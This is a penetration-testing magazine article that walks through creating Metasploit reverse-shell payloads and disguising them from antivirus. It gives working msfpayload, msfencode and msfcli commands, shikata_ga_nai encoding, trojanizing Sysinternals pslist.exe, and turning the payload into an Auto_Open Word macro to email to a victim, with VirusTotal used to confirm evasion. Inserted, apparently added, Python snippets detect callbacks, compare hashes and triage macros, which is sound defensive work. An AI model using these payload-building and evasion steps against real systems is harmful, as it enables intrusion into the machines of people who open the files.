Lead image: © Ozphoto

Hiding a malicious file from virus scanners

Pen Tests

The best way to stop an attack is to think like an attacker. We'll show you how to use the Metasploit framework to create a malicious payload that escapes antivirus detection. By David J. Dodd

A penetration tester simulates an attack on a customer's network by trying to find a way inside. Many such attacks begin with the use of a scanning tool, such as Nexpose, Nessus, or Nmap, to look for network vulnerabilities; however, several of the leading intrusion detection and protection systems are capable of alerting the network owner when a scan is in process. Rather than scanning for an open port, a devious alternative is to email a payload to the victim that will allow the attacker to establish a foothold on the victim's network. The Metasploit framework includes several binary payloads you can use to open an attack by email – if you can slip past the virus scanners.

Metasploit Antivirus Bypass

A skilled intruder who delivers a payload to your network in the form of an email message will want to make sure the payload can evade detection by antivirus software. Most antivirus software vendors use a signature base to identify malicious code. To avoid antivirus detection, an intruder must devise a payload that will not match the available antivirus signatures.

The Metasploit [1] penetration testing framework provides a collection of tools you can use to test a network by attacking it the way an intruder would attack it. Metasploit's msfpayload utility lets you create a standalone binary to serve as a malicious payload, and the msfencode utility encodes the binary to confuse the antivirus scanners. Msfpayload allows you to generate shellcode, executables, and more. To see a list of options, use msfpayload -h at the command line, and to see a list of available shellcode that you can customize for your specific attack, use msfpayload -l. To see a list of options for msfencode, use msfencode -h at the command line. To view which encoders are available, run the msfencode -l command.

Before I encode the payload to bypass antivirus detection, I need to create a standalone binary with msfpayload: one that launches a simple reverse shell, so that a remote user can connect back to the victim's machine. If the target is a Windows box, I can narrow down the list of available payloads with the

msfpayload -l | grep windows

command, which gives a list of payloads that are specific to Windows operating systems (see Figure 1). I'll start by trying the Windows meterpreter reverse_tcp payload.

Figure 1: Output from msfpayload -l | grep windows.

This payload will connect back to the attacker, injecting the meterpreter server DLL via the Reflective DLL Injection payload (highlighted in Figure 1). The O (capital "oh") command-line argument shows all the available configurable options (see Figure 2).

Figure 2: Using the O command-line argument to view configurable options.

To create the payload, I use the following command:

# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X /root/Desktop/evi1.exe

All that's left now is to deliver the executable to the victim, which requires some skill in itself. To catch the connection when the victim runs the executable, I need a listener running on the attack machine:

# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost= lport=4444 E

This command will open a listener on the local machine over port 4444. Once the victim runs the executable, it will open a meterpreter shell on the victim's Windows box (Figure 3).

Figure 3: Msfcli multi/handler options (above) and executing the listener (below).
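The listener above waits for the victim's machine to connect out to port 4444. From the defender's side, that outbound flow is the thing to look for. The following is an added example for this article, not part of Metasploit or the original text: a small detector run over constructed connection-log lines. The log format and every line in SAMPLE_LOG are constructed, and INTERNAL and HANDLER_PORTS are assumptions (4444 is the handler port the article uses).

```python
"""Spot reverse-shell callbacks in connection logs.

Added example for this article, not part of Metasploit or the original text.
The log format and every line in SAMPLE_LOG are constructed; INTERNAL and
HANDLER_PORTS are assumptions (4444 is the handler port the article uses).
"""
from collections import namedtuple
from ipaddress import ip_address, ip_network

Conn = namedtuple("Conn", "ts src dst dport proto")

INTERNAL = ip_network("10.0.0.0/8")          # assumption: the monitored LAN
HANDLER_PORTS = {4444, 4445, 1337, 31337}     # assumption: ports worth a second look

# Constructed sample log: "timestamp src dst dport proto", one flow per line.
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.15 192.0.2.10 443 tcp
2024-01-01T10:00:02 10.0.0.15 10.0.0.1 53 udp
2024-01-01T10:00:03 10.0.0.15 192.0.2.77 4444 tcp
2024-01-01T10:00:04 10.0.0.22 192.0.2.10 80 tcp
2024-01-01T10:00:05 10.0.0.22 10.0.0.99 4444 tcp
"""


def parse_line(line: str) -> Conn:
    """Split one constructed log line into a Conn record."""
    ts, src, dst, dport, proto = line.split()
    return Conn(ts, ip_address(src), ip_address(dst), int(dport), proto)


def is_callback_candidate(conn: Conn) -> bool:
    """A reverse shell connects *out* from the victim, so the interesting flow
    is internal -> external, over TCP, to a port a handler typically listens on."""
    return (conn.src in INTERNAL and conn.dst not in INTERNAL
            and conn.proto == "tcp" and conn.dport in HANDLER_PORTS)


def find_callbacks(log_text: str) -> list:
    """Return every flow in the log that matches the callback shape."""
    flows = [parse_line(ln) for ln in log_text.splitlines() if ln.strip()]
    return [c for c in flows if is_callback_candidate(c)]


if __name__ == "__main__":
    for c in find_callbacks(SAMPLE_LOG):
        print(f"{c.ts} {c.src} -> {c.dst}:{c.dport} looks like a handler callback")
```

Only the 10.0.0.15 -> 192.0.2.77:4444 flow is reported; the internal 10.0.0.22 -> 10.0.0.99:4444 flow is deliberately not, because this rule covers the egress case. Since LPORT is a free parameter (the article sets it to 4444), a port list alone is weak evidence; pair it with process-level telemetry showing which binary opened the socket.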

Once the payload is working, the next step is to find a way to avoid antivirus detection. The Virus Total website runs virus scans on file content and reports which scanners will detect the file. I'll use Virus Total to check the results from the previous example and see how many antivirus vendors hit on the exploit. As you can see in Figure 4, many vendors have uncovered the file.

Figure 4: Twenty-seven hits by antivirus vendors.

In the hope of achieving a better result, I'll bring in msfencode to try to get past the antivirus vendors. In this case, I'll pipe the raw output of msfpayload as input to msfencode using the shikata ga nai encoder (a name that translates to "nothing can be done" in Japanese).

The encoder will output a Windows binary:

# msfpayload windows/shell_reverse_tcp LHOST= LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/evil.exe

The results still show several hits with antivirus scanners, so I'll take another approach. Some antivirus vendors work on signature-based technology, and the payload shell_reverse_tcp shows up right away, so I'll try using the alternative windows/shell/reverse_tcp payload instead of windows/shell_reverse_tcp:

# msfpayload windows/shell/reverse_tcp LHOST= LPORT=4444 R | msfencode -t exe -x /root/Desktop/pslist.exe -o /root/Desktop/pslist2.exe -e x86/shikata_ga_nai -c 10

I'll also take some additional steps to hide the payload. This time, I take an executable from the Sysinternals site called pslist.exe and use it as a template, encoding the payload 10 times with shikata_ga_nai. The payload is combined with the Sysinternals tool pslist.exe, and the result is written out as pslist2.exe. Unfortunately (for the attacker), the score at Virus Total improves only slightly (see Figure 5). Several common scanners did not identify the exploit. To set up a listener, you can use the msfcli command. If the payload slips through, it will open a shell on my Linux box with admin privileges on the Windows system.

Figure 5: Additional steps hide the payload from some scanners, although several others identify it.
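The two lessons of this section are that a byte signature keyed on the raw payload stops matching once the bytes are encoded, and that a trojanized copy of pslist.exe keeps its name but not its content. The following is an added example for this article, not Metasploit code, and it contains no real shellcode: RAW_PAYLOAD, SIGNATURE and PSLIST_ORIGINAL are constructed placeholder bytes, and a single-byte XOR stands in for what an encoder such as shikata_ga_nai does with a polymorphic decoder and a fresh key per sample. The point is the defender's one: substring signatures are fragile, while a hash comparison against the genuine tool catches the modified binary regardless of how the payload was encoded.

```python
"""Why a fixed byte signature misses an encoded payload, and what a
file-integrity check catches instead.

Added example for this article; it is not Metasploit code and contains no real
shellcode. RAW_PAYLOAD, SIGNATURE and PSLIST_ORIGINAL are constructed
placeholder bytes; the single-byte XOR stands in for a real encoder.
"""
import hashlib

RAW_PAYLOAD = b"\xfc\xe8PLACEHOLDER_REVERSE_TCP_STUB\x90\x90"  # constructed
SIGNATURE = b"REVERSE_TCP_STUB"                                   # constructed "vendor" pattern


def xor_encode(data: bytes, key: int) -> bytes:
    """Flip every byte with one key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def signature_hits(blob: bytes, signatures) -> list:
    """Plain substring matching, the weakest form of signature detection."""
    return [s for s in signatures if s in blob]


# Integrity check: compare the file you actually received with the hash of the
# genuine tool (constructed here; in practice from the publisher or a gold image).
PSLIST_ORIGINAL = b"MZ\x90\x00constructed stand-in for Sysinternals pslist.exe"
KNOWN_GOOD = {"pslist.exe": hashlib.sha256(PSLIST_ORIGINAL).hexdigest()}


def sha256_hex(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def is_known_good(name: str, blob: bytes) -> bool:
    """True only if the bytes match the recorded hash for that file name."""
    return KNOWN_GOOD.get(name) == sha256_hex(blob)


def template_with_payload(template: bytes, payload: bytes) -> bytes:
    """Stand-in for the -x template option: same name, same look, different bytes."""
    return template + payload


def demo() -> dict:
    """Run the signature check and the hash check over the constructed samples."""
    encoded = xor_encode(RAW_PAYLOAD, 0x5A)
    backdoored = template_with_payload(PSLIST_ORIGINAL, encoded)
    return {
        "raw_signature_hits": signature_hits(RAW_PAYLOAD, [SIGNATURE]),
        "encoded_signature_hits": signature_hits(encoded, [SIGNATURE]),
        "backdoored_signature_hits": signature_hits(backdoored, [SIGNATURE]),
        "original_known_good": is_known_good("pslist.exe", PSLIST_ORIGINAL),
        "backdoored_known_good": is_known_good("pslist.exe", backdoored),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The signature fires on the raw bytes and on nothing else, whereas the hash check rejects the modified pslist.exe every time. Hash allowlisting of administrative tools (and, on Windows, checking the Authenticode signature rather than only the file name) is the control this section argues for.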

VBScript Infection

As you can see from the previous attempts, although it is possible to slip past a specific scanner with a specific exploit, in general, virus scanners are very proficient at stripping out dangerous executables. Another way to deliver a dangerous payload is with a Word document. Word documents are commonly sent by email and opened by many people. A Word doc is a great attack vector. Metasploit has some built-in methods for infecting Word documents with malicious Metasploit payloads.

To begin, create the executable payload that will later be converted to VBScript:

# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 ENCODING=shikata_ga_nai X > evi1payload.exe

Now you need to convert this executable to a VBScript with the use of a script found in the Tools section of Metasploit.

Next, just copy the evi1payload.exe to the Tools folder as shown in the following example:

# cp /opt/framework3/msf3/evi1payload.exe /opt/framework3/msf3/tools

Inside the Tools folder is a script called exe2vba.rb. To convert the .exe to a .vbs, issue the following command:

# ruby exe2vba.rb evi1payload.exe evi1_payload.vbs

Next, copy evi1_payload.vbs to a Windows machine that has Microsoft Word installed. Open evi1_payload.vbs with Notepad and then open a blank Microsoft Word document. In Microsoft Word 2003, go to Tools | Macros | Visual Basic Editor, or go to View Macros if you are using Microsoft Word 2010. Next, copy the first portion of evi1_payload.vbs – from Sub Auto_Open() to End Sub – and paste it into the Visual Basic Editor in either Microsoft Word 2003 or 2007 (see Figure 6).

Figure 6: First portion of evi1_payload.vbs in Visual Basic Editor.

The next step is to copy the portion from PAYLOAD DATA to the end into the body of the Word document. To verify that this Word document can get past antivirus vendors, upload it to Virus Total [2] and see if it catches anything (Figure 7). As you can see, the Word doc slips past all the antivirus vendors. (See the Results column on the right side of Figure 7.) The only hard part will be getting the victim to open the document.

Figure 7: Virus Total comes back with no hits.
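The document built above has a recognizable shape even when no scanner has a signature for it: a macro that runs on open, writes a file, launches it, and reads its bytes back out of the document body. The following is an added example for this article, not part of Metasploit or of exe2vba.rb: a heuristic triage of VBA macro source that scores exactly those traits. The macro text and document-body sample are constructed to resemble the pattern the article describes and contain no payload; extracting real macro source from a .doc or .docm (for example with olevba from oletools) is outside this snippet, which works on the text only.

```python
"""Heuristic triage of VBA macro source for auto-execution and dropper behaviour.

Added example for this article; not part of Metasploit or exe2vba.rb.
SAMPLE_MACRO, BENIGN_MACRO and SAMPLE_BODY are constructed and hold no payload.
"""
import re

# Subs that Office runs without the user clicking anything.
AUTO_EXEC = re.compile(
    r"\bSub\s+(Auto_?Open|AutoExec|Document_Open|Workbook_Open)\b", re.I)

# Traits of a dropper: launching a process, writing a file, using %TEMP%,
# carrying a long hex blob, or reading data back out of the document body.
SUSPICIOUS = {
    "shell_exec": re.compile(r"\bShell\b|WScript\.Shell|CreateObject\s*\(", re.I),
    "file_write": re.compile(
        r"\bOpen\b.+\bFor\s+(Binary|Output)\b|\.Write\b|FileSystemObject", re.I),
    "env_temp": re.compile(r"Environ\s*\(\s*\"TEMP\"\s*\)", re.I),
    "hex_blob": re.compile(r"(?:[0-9A-Fa-f]{2}\s*){64,}"),  # 64+ hex pairs
    "body_read": re.compile(r"ActiveDocument\.(Content|Range|Paragraphs)", re.I),
}


def triage_macro(vba_text: str) -> list:
    """Return the names of every trait found in the macro or body text."""
    findings = []
    if AUTO_EXEC.search(vba_text):
        findings.append("auto_exec")
    for name, pattern in SUSPICIOUS.items():
        if pattern.search(vba_text):
            findings.append(name)
    return findings


def verdict(findings: list) -> str:
    """Auto-exec alone is common in benign templates; combined with a shell
    call or a file write it is the dropper shape worth quarantining."""
    if "auto_exec" in findings and ({"shell_exec", "file_write"} & set(findings)):
        return "quarantine"
    if findings:
        return "review"
    return "clean"


# Constructed macro resembling the Auto_Open stub the article describes.
SAMPLE_MACRO = '''
Sub Auto_Open()
    Dim tmp As String
    tmp = Environ("TEMP") & "\\update.exe"
    Open tmp For Binary As #1
    ' payload bytes are read back out of the document body
    Put #1, , ActiveDocument.Content.Text
    Close #1
    Shell tmp, vbHide
End Sub
'''

# Constructed benign macro: runs on open but only touches formatting.
BENIGN_MACRO = '''
Sub Auto_Open()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

# Constructed stand-in for PAYLOAD DATA pasted into the document body.
SAMPLE_BODY = "4d5a9000" * 40


if __name__ == "__main__":
    for label, text in (("macro", SAMPLE_MACRO), ("benign", BENIGN_MACRO),
                        ("body", SAMPLE_BODY)):
        found = triage_macro(text)
        print(f"{label}: {verdict(found)} {found}")
```

The constructed dropper macro is scored "quarantine", the formatting-only macro "review" (it auto-executes and touches the document, which a human should glance at), and the body text "review" because of the hex blob. Scanning the document body as well as the macro is the part most tools skip, and it is precisely where this article's payload lives.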

Once you have delivered the Word document to your intended victim, make sure you have the Metasploit client listener up and running on the attack machine.